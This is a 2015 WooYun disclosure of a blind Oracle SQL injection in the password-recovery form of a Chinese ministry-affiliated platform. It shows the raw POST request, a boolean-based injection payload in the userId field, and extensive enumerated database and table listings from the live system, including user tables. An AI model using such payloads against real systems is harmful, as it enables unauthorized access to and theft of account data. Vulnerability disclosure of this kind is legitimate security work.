当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158522

漏洞标题:工信部旗下某重要监测平台Oracle注入(涉及账户信息)

相关厂商:工信部某网站

漏洞作者: Looke

提交时间:2015-12-05 19:56

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-05: 细节已通知厂商并且等待厂商处理中
2015-12-09: 厂商已经确认,细节仅向厂商公开
2015-12-19: 细节向核心白帽子及相关领域专家公开
2015-12-29: 细节向普通白帽子公开
2016-01-08: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

网站下方大大的几个字,360网站安全检测,吓死宝宝了,赶快找个注入压压惊!

详细说明:

漏洞系统:http://**.**.**.**/
漏洞地址:

POST /findPwd.do HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 12
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/register/find_password.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=0000pQHIKYks0apW4mE8XTaQ7tO:-1
userId=admin*


userId参数存在注入,oracle布尔盲注

---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: userId=admin' AND 3679=3679 AND 'qsAK'='qsAK
---
[14:03:22] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle

漏洞证明:

数据库:

数据库.png


数据项:

Database: SME_JSHZ
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| SERVICE_CREDIT_LOG             | 2540634 |
| ORG_INFO_LOG                   | 1038830 |
| SERVICE_CREDIT                 | 788623  |
| ORG_INFO                       | 461882  |
| SERVICE_ACTIVITY_LOG           | 412270  |
| SERVICE_ITEM_LOG               | 293498  |
| SERVICE_ORG_INFO_LOG           | 103617  |
| SERVICE_ACTIVITY               | 79292   |
| ORG_IN_FLAT_LOG                | 59664   |
| SERVICE_ITEM                   | 58674   |
| SERVICE_ORG_INFO               | 37043   |
| ORG_IN_FLAT                    | 21340   |
| REPORTC_1_SERVICEITEM          | 18077   |
| REPORTA_12_SERVICEITEM         | 15108   |
| SYS_LOG                        | 12861   |
| REPORTA_2_SERVICEORGINFO       | 8464    |
| REPORTA_3_ORGINFO              | 8426    |
| SERVICE_CREDIT_TEMP            | 8328    |
| REPORTA_5_SERVICECREDIT        | 8232    |
| REPORTA_6_SERVICECREDIT        | 8232    |
| REPORTA_8_SERVICECREDIT        | 8232    |
| REPORTA_1_FLATINFO             | 8165    |
| REPORTA_7_SERVICECREDIT        | 7635    |
| REPORTA_4_SERVICECREDIT        | 7207    |
| REPORTA_10_SERVICEACTIVITY     | 7036    |
| REPORTA_11_SERVICEACTIVITY     | 7036    |
| SHARE_DATA_LOG                 | 6800    |
| ORG_INFO_DEL                   | 6390    |
| ORG_INFO_TEMP                  | 6269    |
| REPORTA_9_SERVICECREDIT        | 5834    |
| CRUD_STATS                     | 5046    |
| REPORTA_13_SERVICEACTIVITY     | 4874    |
| REPORTB_1_FREQUENCY            | 4665    |
| REPORTB_2_FILENUM              | 4665    |
| ZIPCODE                        | 3515    |
| ZIPCODE20130831                | 3515    |
| SERVICE_ITEM_TEMP              | 3493    |
| ORG_IN_FLAT_TEMP               | 3396    |
| FLAT_INFO_LOG                  | 3324    |
| CRUD_STATS_MONTH               | 2315    |
| SERVICE_CREDIT_DEL             | 1816    |
| SERVICE_ORG_INFO_DEL           | 1782    |
| SICCODE                        | 1642    |
| SERVICE_ITEM_DEL               | 1184    |
| ORG_IN_FLAT_DEL                | 851     |
| SERVICE_ACTIVITY_TEMP          | 809     |
| SERVICE_ACTIVITY_DEL           | 742     |
| FLAT_INFO                      | 700     |
| SERVICE_ORG_INFO_TEMP          | 658     |
| NEWS_INFO                      | 161     |
| FLAT_INFO_DEL                  | 136     |
| SERVICE_CLASS                  | 118     |
| ACCESS_LOG                     | 65      |
| JSHZ_USER                      | 52      |
| JSHZ_USER                      | 52      |
| TEMP_MW                        | 50      |
| AREA_INFO                      | 35      |
| REGISTER_TYPE                  | 31      |
| FLAT_INFO_TEMP                 | 15      |
| SHARE_TYPE                     | 5       |
+--------------------------------+---------+
Database: SERVICEPLAT
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| SERVICE_EFFECT                 | 41237   |
| FLAT_SCHEDULE                  | 9756    |
| SME_USER                       | 5523    |
| ZIPCODE                        | 3513    |
| INVEST_USER                    | 2300    |
| SERVICE_EFFECT_INIT            | 2254    |
| ORG_INFO                       | 2138    |
| ORG_MANAGER                    | 1914    |
| INVEST_TAB_EFFECT              | 1866    |
| ENP_BASE                       | 1648    |
| SICCODE                        | 1642    |
| AREA_JSON                      | 1606    |
| AREA_JSON_CY                   | 1559    |
| INVEST_TAB_RESOURCE            | 1555    |
| MOBILETEST                     | 1301    |
| INVEST_TAB_RUN                 | 1244    |
| BASIC_DATA                     | 1081    |
| BASIC_DATA_ORIGINAL            | 1077    |
| FLAT_INFO                      | 1052    |
| INVEST_SERVICED_ORG            | 1044    |
| INVEST_TAB_PERFORMANCE         | 933     |
| OP_HISTORY                     | 833     |
| FLAT_SCHEDULE_INIT             | 711     |
| INVEST_TAB_BUSINESS            | 622     |
| FULONG_SFPT                    | 615     |
| INVEST_TAB_SERVICE             | 612     |
| TEMP_MW                        | 511     |
| INVEST05                       | 477     |
| BASIC_DATA2013                 | 380     |
| INVEST_TAB_INFO                | 311     |
| INVEST_TAB_METHOD              | 311     |
| INVEST_TAB_QUALITY             | 311     |
| ORG_INFO_JSON                  | 307     |
| ORG_INFO_JSON_R                | 307     |
| INVEST_TAB_INSTITUTION         | 301     |
| AAA                            | 250     |
| INVEST_SERVICE_RESOURCE        | 219     |
| ORG_INFO_TEMP                  | 208     |
| TABSTR_CHAGOTL                 | 196     |
| PROV_SUMMARY                   | 167     |
| SERVICE_CLASS                  | 118     |
| AREA_FUNDING                   | 102     |
| SUCCESS_CASE                   | 64      |
| SERVICE_ITEM                   | 59      |
| SCALE_STANDARD                 | 57      |
| USER_PERMISSIONS               | 52      |
| USER_ADMIN_AREA                | 38      |
| APPROVED_PLAN                  | 36      |
| FLAT_FINISH_INFO               | 36      |
| PILOT_AREA                     | 36      |
| AREA_JSON_ZSCQ                 | 32      |
| EXPERTS                        | 31      |
| MAPCODE                        | 31      |
| REGISTER_TYPE                  | 31      |
| PTBS_NEWS_INFO                 | 30      |
| CHANNEL_INFO                   | 11      |
| CHANNEL                        | 9       |
| PROFESSIONAL_QUALIFICATION     | 4       |
| SERVICE_DEMAND                 | 4       |
| RECOMMEND_SERVICE_ORG          | 3       |
| ASSESSMENT_EVALUATION          | 2       |
| ORG_REPORT                     | 2       |
+--------------------------------+---------+
Database: ORDSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| SI_IMAGE_FORMATS_TAB           | 17      |
| SI_VALUES_TAB                  | 8       |
| SI_FEATURES_TAB                | 4       |
+--------------------------------+---------+
Database: APEX_030200
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| WWV_FLOW_DICTIONARY$           | 70601   |
| WWV_FLOW_STEP_ITEMS            | 9673    |
| WWV_FLOW_REGION_REPORT_COLUMN  | 7918    |
| WWV_FLOW_PAGE_PLUGS            | 7417    |
| WWV_FLOW_STEP_ITEM_HELP        | 6335    |
| WWV_FLOW_LIST_OF_VALUES_DATA   | 4184    |
| WWV_FLOW_MESSAGES$             | 3706    |
| WWV_FLOW_STEP_BUTTONS          | 3513    |
| WWV_FLOW_STEP_BRANCHES         | 3255    |
| WWV_FLOW_LIST_ITEMS            | 3048    |
| WWV_FLOW_STEP_PROCESSING       | 2239    |
| WWV_FLOW_STEP_VALIDATIONS      | 1990    |
| WWV_FLOW_STEPS                 | 1755    |
| WWV_FLOW_MENU_OPTIONS          | 1452    |
| WWV_FLOW_STEP_COMPUTATIONS     | 984     |
| WWV_FLOW_LISTS_OF_VALUES$      | 959     |
| WWV_FLOW_WORKSHEET_COLUMNS     | 721     |
| WWV_FLOW_LISTS                 | 601     |
| WWV_FLOW_REGION_UPD_RPT_COLS   | 439     |
| WWV_FLOW_STANDARD_ICONS        | 319     |
| WWV_FLOW_COUNTRIES             | 240     |
| WWV_FLOW_TRANSLATABLE_COLS$    | 232     |
| WWV_FLOW_SW_MAIN_KEYWORDS      | 199     |
| WWV_FLOW_PAGE_PLUG_TEMPLATES   | 166     |
| WWV_FLOW_LANGUAGES             | 132     |
| WWV_FLOW_LIST_TEMPLATES        | 105     |
| WWV_FLOW_PAGE_GROUPS           | 105     |
| WWV_FLOW_DUAL100               | 100     |
| WWV_FLOW_LANGUAGE_MAP          | 90      |
| WWV_FLOW_ITEMS                 | 89      |
| WWV_FLOW_UPGRADE_PROGRESS      | 89      |
| WWV_MIG_RESERVED_WORDS         | 87      |
| WWV_FLOW_TEMPLATES             | 64      |
| WWV_FLOW_HNT_COLUMN_INFO       | 58      |
| WWV_FLOW_ROW_TEMPLATES         | 54      |
| WWV_FLOW_RESTRICTED_SCHEMAS    | 46      |
| WWV_FLOW_PROCESSING            | 45      |
| WWV_MIG_FRM_OLB_XMLTAGTABLEMAP | 45      |
| WWV_FLOW_PAGE_GENERIC_ATTR     | 44      |
| WWV_FLOW_RANDOM_IMAGES         | 42      |
| WWV_FLOW_UPG_TAB_NAME_CHANGES  | 42      |
| WWV_FLOW_SHORTCUTS             | 39      |
| WWV_FLOW_ALT_CONFIG_PICK       | 37      |
| WWV_FLOW_FIELD_TEMPLATES       | 36      |
| WWV_MIG_FRM_XMLTAGTABLEMAP     | 36      |
| WWV_FLOW_CHARSETS              | 32      |
| WWV_FLOW_COMPANY_TYPES         | 32      |
| WWV_FLOW_WORKSHEET_RPTS        | 30      |
| WWV_FLOW_WORKSHEETS            | 30      |
| WWV_FLOW_STANDARD_CSS          | 27      |
| WWV_FLOW_PLATFORM_PREFS        | 21      |
| WWV_FLOW_SECURITY_SCHEMES      | 19      |
| WWV_FLOW_QUERY_COLUMN          | 18      |
| WWV_FLOW_UPG_TAB_OBSOLETE      | 17      |
| WWV_MIG_RPT_XMLTAGTABLEMAP     | 15      |
| WWV_FLOW_COMPUTATIONS          | 14      |
| WWV_FLOW_WORKSPACE_REQ_SIZE    | 14      |
| WWV_FLOW_BUTTON_TEMPLATES      | 12      |
| WWV_FLOW_ICON_BAR              | 12      |
| WWV_FLOW_CALS                  | 11      |
| WWV_FLOW_CUSTOM_AUTH_SETUPS    | 11      |
| WWV_FLOW_BANNER                | 10      |
| WWV_FLOW_POPUP_LOV_TEMPLATE    | 10      |
| WWV_FLOW_SW_CREATE_KEYWORDS    | 10      |
| WWV_FLOW_THEMES                | 10      |
| WWV_FLOWS                      | 10      |
| WWV_FLOW_CAL_TEMPLATES         | 9       |
| WWV_FLOW_DEVELOPER_ROLES       | 9       |
| WWV_FLOW_PATCHES               | 9       |
| WWV_FLOW_HNT_TABLE_INFO        | 8       |
| WWV_FLOW_MENU_TEMPLATES        | 8       |
| WWV_FLOW_SW_SQLPLUS_CMD        | 8       |
| WWV_FLOW_MENUS                 | 7       |
| WWV_MIG_MENU_XMLTAGTABLEMAP    | 7       |
| WWV_FLOW_LOV_VALUES            | 6       |
| WWV_FLOW_QUERY_CONDITION       | 6       |
| WWV_FLOW_QUERY_DEFINITION      | 6       |
| WWV_FLOW_QUERY_OBJECT          | 6       |
| WWV_FLOW_FLASH_CHART_SERIES    | 5       |
| WWV_FLOW_FLASH_CHARTS          | 5       |
| WWV_FLOW_PICK_PAGE_VIEWS       | 5       |
| WWV_FLOW_TOPLEVEL_TABS         | 5       |
| WWV_MIG_EXPORTER               | 5       |
| WWV_FLOW_PICK_END_USERS        | 4       |
| WWV_FLOW_SW_SET_KEYWORDS       | 4       |
| WWV_COLUMN_EXCEPTIONS          | 3       |
| WWV_FLOW_COMPANIES             | 3       |
| WWV_FLOW_TABS                  | 3       |
| WWV_FLOW_TREES                 | 3       |
| WWV_FLOW_INSTALL               | 2       |
| WWV_FLOW_STANDARD_JS           | 2       |
| WWV_FLOW_ACTIVITY_LOG_NUMBER$  | 1       |
| WWV_FLOW_APPLICATION_GROUPS    | 1       |
| WWV_FLOW_CLICKTHRU_LOG_NUMBER$ | 1       |
| WWV_FLOW_COMPANY_SCHEMAS       | 1       |
| WWV_FLOW_DB_AUTH               | 1       |
| WWV_FLOW_FND_USER              | 1       |
| WWV_FLOW_PASSWORD_HISTORY      | 1       |
| WWV_FLOW_USER_ACCESS_LOG_NUM$  | 1       |
+--------------------------------+---------+
Database: OLAPSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| CWM$CLASSIFICATION             | 41      |
| CWM2$MRALL_DESCRIPTORS         | 41      |
| CWM$DOMAIN                     | 21      |
| CWM$CLASSIFICATIONTYPE         | 15      |
| CWM$OBJECTTYPE                 | 15      |
| CWM$FUNCTION                   | 14      |
| CWM$CLASSIFICATIONENTRY        | 5       |
| CWM$PARAMETER                  | 5       |
| CWM2$AWDIMLOADPARM             | 4       |
| CWM$PROJECT                    | 3       |
| CWM$MODEL                      | 2       |
| CWM2$AWCUBELOADTYPE            | 2       |
| CWM2$AWDIMLOADTYPE             | 2       |
| CWM2$AWCUBELOADPARM            | 1       |
+--------------------------------+---------+
Database: INTERNALRESOURSE
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| DATA01                         | 9360    |
| DATA04                         | 1800    |
| DATA02                         | 1118    |
| SICCODE                        | 80      |
| ZIPCODE                        | 31      |
| XYZB_CODE                      | 20      |
+--------------------------------+---------+
Database: BAOSONG
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| ORG_REPORT2                    | 23670644 |
| INVEST_ANSWER                  | 3503593 |
| INVEST_ANSWER_13_2014          | 3358827 |
| INVEST_ANSWER_13_2013          | 2459182 |
| INVEST_ANSWER_11               | 1684408 |
| ORG_REPORT1                    | 1671678 |
| ORG_REPORT3                    | 1644826 |
| INVEST_ANSWER_13_2012          | 693957  |
| INVEST_ANSWER_COPY             | 577957  |
| INVEST_ANSWER_14               | 302958  |
| ORG_INFO                       | 179138  |
| INVEST_ANSWER_26               | 178230  |
| MANAGER_USER                   | 175796  |
| ORG_INFO_MW                    | 174339  |
| INVEST_ANSWER_15               | 170950  |
| SME_USER                       | 92224   |
| ADDRESS_BOOK                   | 45041   |
| CHOOSE_SHEET2                  | 43626   |
| INVEST_ANSWER_21               | 34866   |
| INVEST_ANSWER_20151008_MAIN    | 24910   |
| ORG_INDEX_CODE                 | 9999    |
| SEQ_ID                         | 9999    |
| INVEST_ANSWER_20151008         | 8642    |
| INVEST_ANSWER_20151008_BAK     | 8503    |
| ORG_INFO_BASE                  | 8065    |
| WORD_DATA                      | 5775    |
| MESSAGE_SEND                   | 3879    |
| INVEST20140807                 | 3772    |
| ZIPCODE                        | 3623    |
| ZIPCODE_NEW                    | 3548    |
| ZIPCODE20101231                | 3520    |
| ZIPCODE20130831                | 3515    |
| ZIPCODE20111031                | 3511    |
| ORG_REGISTER                   | 2804    |
| INVEST_REPORT                  | 2729    |
| USER_ADMIN_AREA                | 2349    |
| SICCODE                        | 1642    |
| SICCODE_OLD                    | 1424    |
| CHANNEL_INFO                   | 1215    |
| PROV_REPORT                    | 976     |
| LEAVEWORD                      | 804     |
| INVEST_QUESTION                | 355     |
| INDEXMAP_DATE                  | 338     |
| USER_DEFINED_SORT              | 338     |
| INDEXMAP_CHANNEL               | 253     |
| ANALYSE_REPORT                 | 191     |
| REPORT_ORDER                   | 172     |
| ANALYSE_REPORT_ATT             | 127     |
| CHOOSE_SHEET1                  | 107     |
| SCALE_CONDITION                | 57      |
| ORG_INFO_SHENZHEN              | 53      |
| REGISTER_TYPE                  | 31      |
| INDEXMAP                       | 26      |
| ADDRESS_BOOK_GROUP             | 24      |
| CHANNEL                        | 24      |
| ADDRESS_BOOK2                  | 21      |
| INDEX_CODE                     | 21      |
| INVEST_ITEM                    | 20      |
| NEW_INDEX_CODE                 | 17      |
| INVEST_ANSWER_20               | 13      |
| PROV_DEFINED_SORT              | 12      |
| INVEST_QUERY_DATE              | 5       |
| SHARE_TYPE                     | 5       |
| SCALE_TYPE                     | 3       |
| INDEX_CHANNEL                  | 2       |
| VISITOR_LOG                    | 2       |
| INVEST20150930                 | 1       |
+--------------------------------+---------+
Database: SME_SHARE
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| INFO_RIGHT                     | 27874   |
| INFO_GRANT                     | 7478    |
| INFO                           | 1738    |
| INFO_CONTENT                   | 1724    |
| INFO_ATTACHMENT                | 1550    |
| GROUP_MEMBER                   | 279     |
| APP_USER                       | 95      |
| DR$INFO_SEARCH_CONTENT_TIDX$R  | 22      |
| DR$INFO_SEARCH_TITLE_TIDX$R    | 22      |
| INFO_COLUMN                    | 10      |
| INFO_COLLECTION                | 9       |
| USER_GROUP                     | 9       |
+--------------------------------+---------+
Database: ZP2008
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| ZP_POSITION                    | 288779  |
| ZP_ORG_INFO                    | 111039  |
| ZP_USER                        | 104728  |
| RESUME_MAIL                    | 54496   |
| RESUME                         | 37990   |
| ZIPCODE                        | 3518    |
| ZP_COUNT_DAY                   | 3109    |
| ZIPCODE_OLD                    | 2844    |
| ZP_LEAVEWORD                   | 1528    |
| COLLECTION                     | 1510    |
| SICCODE                        | 1424    |
| ZP_YQLJ                        | 1355    |
| RECOMMEND_ORG                  | 445     |
| CHANNEL_INFO                   | 274     |
| INVEST_ANSWER                  | 232     |
| ZP_ORG_MANAGER                 | 112     |
| USER_ADMIN_AREA                | 99      |
| TEMP_USER                      | 75      |
| CHANNEL                        | 41      |
| JOB_CODE                       | 35      |
| HOT_AREA                       | 16      |
| HOT_INDUSTRY                   | 8       |
| ZP_COUNT                       | 1       |
| ZP_MATCH                       | 1       |
+--------------------------------+---------+
Database: DBSNMP
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| BSLN_TIMEGROUPS                | 168     |
| BSLN_METRIC_DEFAULTS           | 49      |
| MGMT_CAPTURE_SQL               | 14      |
| MGMT_BASELINE_SQL              | 7       |
| MGMT_CAPTURE                   | 2       |
| MGMT_LATEST_SQL                | 2       |
| BSLN_BASELINES                 | 1       |
| MGMT_BASELINE                  | 1       |
| MGMT_DB_FEATURE_LOG            | 1       |
| MGMT_LATEST                    | 1       |
| MGMT_RESPONSE_CONFIG           | 1       |
+--------------------------------+---------+
Database: SME_SURVEY
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| INVEST_POOL                    | 9999    |
| ZIPCODE                        | 3515    |
| SICCODE                        | 1642    |
| INVEST_QUESTION                | 144     |
| INVEST_ITEM                    | 12      |
| SME_USER                       | 10      |
| SHARE_TYPE                     | 5       |
| ANSWER2015_0002                | 4       |
| ANSWER2015_0003                | 4       |
| INVEST_USER                    | 4       |
| ANSWER2015_0001                | 3       |
| ANSWER2015_0009                | 3       |
| ANSWER2015_0012                | 3       |
| WEBSITE_INFO                   | 3       |
| ANSWER2015_0004                | 2       |
| ANSWER2015_0005                | 2       |
| ANSWER2015_0008                | 2       |
| ANSWER2015_0007                | 1       |
| ANSWER2015_0011                | 1       |
| HOTKEY                         | 1       |
+--------------------------------+---------+
Database: CTXSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| DR$OBJECT_ATTRIBUTE            | 480     |
| DR$DBO                         | 347     |
| DR$NUMBER_SEQUENCE             | 256     |
| DR$INDEX_VALUE                 | 250     |
| DR$OBJECT_ATTRIBUTE_LOV        | 168     |
| DR$STOPWORD                    | 76      |
| DR$OBJECT                      | 52      |
| DR$INDEX_OBJECT                | 36      |
| DR$PREFERENCE                  | 32      |
| DR$PARAMETER                   | 30      |
| DR$PREFERENCE_VALUE            | 26      |
| DR$FEATURE_USED                | 16      |
| DR$CLASS                       | 12      |
| DR$SECTION_GROUP               | 5       |
| DR$INDEX                       | 4       |
| DR$STOPLIST                    | 3       |
| DR$STATS                       | 2       |
| DR$INDEX_SET                   | 1       |
+--------------------------------+---------+
Database: WMSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| WM$HINT_TABLE                  | 58      |
| WM$SYSPARAM_ALL_VALUES         | 27      |
| WM$EVENTS_INFO                 | 12      |
| WM$WORKSPACE_PRIV_TABLE        | 8       |
| WM$ENV_VARS                    | 2       |
| AQ$_WM$EVENT_QUEUE_TABLE_S     | 1       |
| WM$NEXTVER_TABLE               | 1       |
| WM$VERSION_HIERARCHY_TABLE     | 1       |
| WM$WORKSPACES_TABLE            | 1       |
+--------------------------------+---------+
Database: SYSMAN
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| MGMT_MESSAGES                  | 23311   |
| MGMT_METRICS                   | 12796   |
| MGMT_METRICS_1HOUR             | 8031    |
| MGMT_METRICS_RAW               | 7047    |
| MGMT_ARU_PRODUCT_RELEASE_MAP   | 5956    |
| MGMT_JOB_STEP_PARAMS           | 5277    |
| MGMT_POLICIES                  | 3302    |
| MGMT_METRICS_1DAY              | 2201    |
| MGMT_IP_REPORT_ELEM_PARAMS     | 2167    |
| MGMT_JOB_EXECPLAN              | 1849    |
| MGMT_ARU_FAMILY_PRODUCT_MAP    | 1660    |
| MGMT_ESA_REPORT                | 1207    |
| MGMT_POLICY_ASSOC_CFG          | 1170    |
| MGMT_POLICY_ASSOC              | 1118    |
| MGMT_ARU_RELEASES              | 863     |
| MGMT_SYSTEM_PERFORMANCE_LOG    | 844     |
| MGMT_ECM_SNAPSHOT_MD_COLUMNS   | 837     |
| MGMT_ARU_PRODUCTS              | 744     |
| MGMT_SWLIB_REVISION_PARAMETERS | 728     |
| MGMT_POLICY_ASSOC_CFG_PARAMS   | 713     |
| MGMT_ECM_MD_ALL_TBL_COLUMNS    | 702     |
| MGMT_JOB_PARAM_SOURCE          | 652     |
| MGMT_POLICY_VIOL_CTXT_DEF      | 642     |
| MGMT_CATEGORY_MAP              | 637     |
| MGMT_POLICY_TYPE_VERSIONS      | 585     |
| MGMT_ARU_OUI_COMPONENTS        | 393     |
| MGMT_SWLIB_ENTITY_DOCUMENTS    | 364     |
| MGMT_IP_REPORT_DEF_ELEMENTS    | 349     |
| MGMT_VIOLATIONS                | 331     |
| MGMT_LAST_VIOLATION            | 307     |
| MGMT_METRICS_COMPOSITE_KEYS    | 307     |
| MGMT_JOB_TYPE_PARAM_DSPLY_INFO | 300     |
| MGMT_TARGET_PROP_DEFS          | 288     |
| MGMT_CURRENT_METRICS           | 275     |
| MGMT_METRIC_VERSIONS           | 273     |
| MGMT_COLL_ITEMS                | 254     |
| MGMT_INV_DEPENDENCY_RULE       | 252     |
| MGMT_SNAPSHOT_METRIC_MAP       | 221     |
| MGMT_COLL_ITEM_METRICS         | 217     |
| MGMT_TARGET_PROPERTIES         | 203     |
| MGMT_COLLECTIONS               | 202     |
| MGMT_DB_RECSEGMENTSETTINGS_ECM | 200     |
| MGMT_COLLECTION_METRIC_TASKS   | 196     |
| MGMT_JOB_TYPE_INFO             | 187     |
| MGMT_SWLIB_ENTITY_REVISIONS    | 182     |
| MGMT_JOB_TYPE_MAX_VERSIONS     | 180     |
| MGMT_JOB_VALUE_PARAMS          | 180     |
| MGMT_SWLIB_ENTITIES            | 180     |
| MGMT_SWLIB_ENTITY_PARAMETERS   | 180     |
| MGMT_POLICY_BIND_VARS          | 169     |
| MGMT_POLICY_ASSOC_EVAL_SUMM    | 153     |
| MGMT_SWLIB_ENTITY_DATA         | 150     |
| MGMT_JOB_COMMAND               | 146     |
| MGMT_INV_COMPONENT             | 144     |
| MGMT_JOB_SINGLE_TARGET_TYPES   | 137     |
| MGMT_IP_REPORT_DEF_JIT_TYPES   | 135     |
| MGMT_PRIV_GRANTS               | 133     |
| MGMT_IP_ELEM_DEFAULT_PARAMS    | 130     |
| MGMT_TARGET_ROLLUP_TIMES       | 130     |
| ESM_COLLECTION                 | 126     |
| MGMT_NESTED_JOB_TARGETS        | 126     |
| MGMT_POLICY_ASSOC_EVAL_DETAILS | 126     |
| MGMT_IP_REPORT_DEF             | 124     |
| MGMT_ECM_SNAPSHOT_MD_TABLES    | 122     |
| MGMT_VIOLATION_CONTEXT         | 120     |
| MGMT_CS_HIERARCHY              | 117     |
| MGMT_IP_ELEM_PARAM_CLASSES     | 116     |
| MGMT_PERFORMANCE_NAMES         | 106     |
| MGMT_JOB_CRED_PARAMS           | 101     |
| MGMT_JOB_TYPE_URI_INFO         | 99      |
| MGMT_CS_RULE                   | 94      |
| MGMT_SWLIB_DIRECTORIES         | 88      |
| MGMT_CALLBACKS                 | 87      |
| MGMT_JOB_TYPE_DISPLAY_INFO     | 87      |
| MGMT_CREDENTIAL_SET_COLUMNS    | 86      |
| MGMT_IP_ELEM_TARGET_TYPES      | 86      |
| MGMT_CURRENT_VIOLATION         | 84      |
| MGMT_PARAMETERS                | 84      |
| MGMT_IP_REPORT_ELEM_DEF        | 77      |
| MGMT_ARU_PLATFORMS             | 76      |
| MGMT_METADATA_SETS             | 76      |
| MGMT_TYPE_PROPERTIES           | 75      |
| MGMT_BLACKOUT_REASON           | 60      |
| MGMT_LICENSE_DEFINITIONS       | 59      |
| MGMT_ECM_SNAPSHOT_METADATA     | 53      |
| MGMT_LICENSABLE_TARGET_TYPES   | 49      |
| MGMT_COLL_ITEM_PROPERTIES      | 48      |
| MGMT_DM_ALITEMS                | 48      |
| MGMT_CREDENTIAL_TYPE_COLUMNS   | 45      |
| MGMT_DM_RULEENTRY              | 45      |
| MGMT_NOTIFY_RULE_CONFIGS       | 41      |
| MGMT_USER_SUBTAB_COL_PREFS     | 41      |
| MGMT_ARU_LANGUAGES             | 40      |
| MGMT_LOADER_DESIGNATORS        | 40      |
| MGMT_ECM_MD_HIST_TBLS          | 39      |
| MGMT_STRING_METRIC_HISTORY     | 39      |
| MGMT_TARGET_TYPE_VERSIONS      | 37      |
| MGMT_PURGE_POLICY_TARGET_STATE | 36      |
| MGMT_CREDENTIAL_SETS           | 35      |
| MGMT_TARGET_DELETE_EXCEPTIONS  | 35      |
| MGMT_IP_SQL_STATEMENTS         | 31      |
| MGMT_MP_HOMEPAGE_REPORTS       | 30      |
| MGMT_ECM_ARU_MAP               | 29      |
| MGMT_COLLECTION_TASKS          | 28      |
| MGMT_TARGET_TYPES              | 28      |
| MGMT_TASK_QTABLE               | 28      |
| MGMT_NOTIFY_QUEUES             | 27      |
| MGMT_OUI_ARU_MAP               | 27      |
| MGMT_POLICY_PARAMETERS         | 27      |
| MGMT_USER_CALLBACKS            | 27      |
| MGMT_JOB_PROP_PARAMS           | 25      |
| MGMT_OPERATIONS_MASTER         | 25      |
| MGMT_JOB_SUBST_PARAMS          | 24      |
| MGMT_PRIVS                     | 24      |
| MGMT_USER_FOLDERS              | 24      |
| MGMT_CS_RULEFOLDER             | 23      |
| MGMT_OMS_PARAMETERS            | 23      |
| MGMT_HC_OS_PROPERTIES          | 20      |
| MGMT_METRIC_ERRORS             | 20      |
| MGMT_METRICS_EXT               | 20      |
| MGMT_ADMIN_LICENSES            | 19      |
| MGMT_CREDENTIAL_TYPES          | 19      |
| MGMT_DM_RULETEMPLATES          | 19      |
| MGMT_AVAILABILITY              | 17      |
| MGMT_PAF_JOBTYPE_PARAMS        | 17      |
| MGMT_METRIC_DEPENDENCY_DEF     | 16      |
| MGMT_PURGE_POLICY              | 16      |
| MGMT_AVAILABLE_SEARCHES        | 15      |
| MGMT_JOB_USER_PARAMS           | 15      |
| MGMT_TARGET_ASSOC_DEFS         | 15      |
| MGMT_ECM_RESOURCES             | 14      |
| MGMT_ROWSET_HANDLERS           | 14      |
| MGMT_PAF_APPLICATIONS          | 13      |
| MGMT_PRIV_INCLUDES             | 13      |
| MGMT_TARGET_ADD_CALLBACKS      | 13      |
| MGMT_CATEGORIES                | 12      |
| MGMT_ERROR_MASTER              | 12      |
| MGMT_JOB_EXECUTION             | 12      |
| MGMT_JOB_HISTORY               | 12      |
| MGMT_JOB_SEC_INFO              | 12      |
| MGMT_JOB_SQL_PARAMS            | 10      |
| EMDW_TRACE_CONFIG              | 9       |
| EUME2E_ASSOCS_LOOKUP           | 9       |
| MGMT_CREDENTIAL_TYPE_REF       | 9       |
| MGMT_GROUP_DEFAULT_CHART       | 9       |
| MGMT_LICENSED_TARGETS          | 9       |
| MGMT_PDP_PARAM_METADATA        | 9       |
| MGMT_CREDENTIAL_SET_COL_VALS   | 8       |
| MGMT_HC_CPU_DETAILS            | 8       |
| MGMT_HC_VENDOR_SW_SUMMARY      | 8       |
| MGMT_JOB_DISPLAY_ERROR_CODES   | 8       |
| EM_PAGE_CONDITION_METADATA     | 7       |
| MGMT_JOB_TYPE_PARAM_URI_INFO   | 7       |
| MGMT_NOTIFY_RULES              | 7       |
| MGMT_PAF_PROCEDURES            | 7       |
| MGMT_PAF_TEXTUAL_DATA          | 7       |
| MGMT_PURGE_POLICY_GROUP        | 7       |
| MGMT_BSLN_METRICS              | 6       |
